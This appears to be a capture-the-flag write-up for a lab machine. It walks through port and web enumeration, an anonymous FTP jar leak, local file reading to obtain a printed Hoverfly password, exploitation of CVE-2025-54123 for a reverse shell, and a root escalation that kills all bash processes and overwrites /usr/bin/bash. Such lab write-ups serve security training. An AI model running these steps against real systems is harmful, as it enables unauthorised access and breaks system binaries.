Port Enumeration

nmap -p- --open -vvv -n -Pn -sS --min-rate 5000 10.129.16.180 -oG AllPorts.txt
nmap -p21,22,80,8080,8500,8888 -sCV --min-rate 10000 10.129.16.180

I found 6 open ports, ftp, ssh and 4 http.
5994b8378bbd95a6197497eb83be1b2a.png
6952db700fae5fc656935e429af58363.png

FTP enumeration

The ftp server have the anonymous user enabled.
db35de9e3fb0e26e0e9320c30e9a9489.png
Here, I found a .jar file.
4bbd0f049f9cef56e09c8e049aea24e6.png

Jar decompilation

Using cfr, I decompile the jar file.

java -jar cfr-0.152.jar employee-service.jar --outputdir output

Reading the code I found a possible web service.
54327aab747ad723d9d883732603d661.png
This service should be working in 8080 port.
d2c92ae138004a7e30144c5ec0aa0867.png

Web enumeration

Port 80

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt -e .php,.txt -u http://devarea.htb/FUZZ

4d34f88cbd590a6c342e3ae4e9a8d68e.png

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://devarea.htb/ -fw 18 -H "Host: FUZZ.devarea.htb"

Port 8080

We got here the employeeservice service working.
17f5b032515ab94d9796e0788cbfd1f6.png
Here, I readed the Apache version and found a vulnerability.
7f66e35206a019beab057b12c3ad3032.png
ce528835c00dbf9567937e5a9f033b70.png
With this, Im able to read local files.
2d56ddb62cbc4cd66f38ba7e23589600.png
44e47914cc18331e1ef1d3b3fa81bf9e.png
The main user
a34703a7258b0c4efcecfdbd14696b49.png
Now, I extract the Hoverfly config file, with its credentials.
7266b2c7ba92a304030d091e6569edd1.png
6c7c4a23731c667b141bfee7c20d08e6.png

07IJ27MyyXiU

Port 8500

Its a proxy.

Port 8888

Here I found a Hoverfly instance.
c9714df862a9ea3c4881a8b06153f664.png
Here I found a possible RCE.
bbe89ae3f7c94498ea2b9a63bbcb0b02.png
But I cant exploit It.
01ed4271eee1ca4678046f02a1e1a290.png

RCE

Using the credentials found In the Hoverfly confil file, Im able to log in.
09dda8b16053bebef921bf4650d0d8e6.png
Now, I can exploit CVE-2025-54123
c528495d20bc324ea0ddb5fd9e856044.png
With this, Im able to execute a reverse shell.
90b54681db600de3f597540d61fb78aa.png
a3f9fed5d74a6212307a94b39f698b75.png

Local machine enumeration

Inside the user home I found a zip.
3aaded74cdd82c9991d4225d5f86cba9.png
Also, Syswatch is a script who I can use as root.
72598be29a9acee829d099729d241373.png After analicing the script, I can see who It uses bash binary in an unsecure way, so, I will regrite the script to get a shell. For this, first, I need to get a shell with sh and copy the original binary. 5c77d5553eb6877ceabcc0a885b45937.png

cp /bin/bash /tmp/bash

Now, I need to clean all the bash instances.

killall -9 bash

Now, I can rewrite a bash shell, but writing an script.

echo '#!/tmp/bash\ncat /root/root.txt' > /tmp/bashroot
cp /tmp/bashroot /usr/bin/bash

And now I execute the script with sudo and this will give me the flag. 351ed72f556f04288074e98b4156361f.png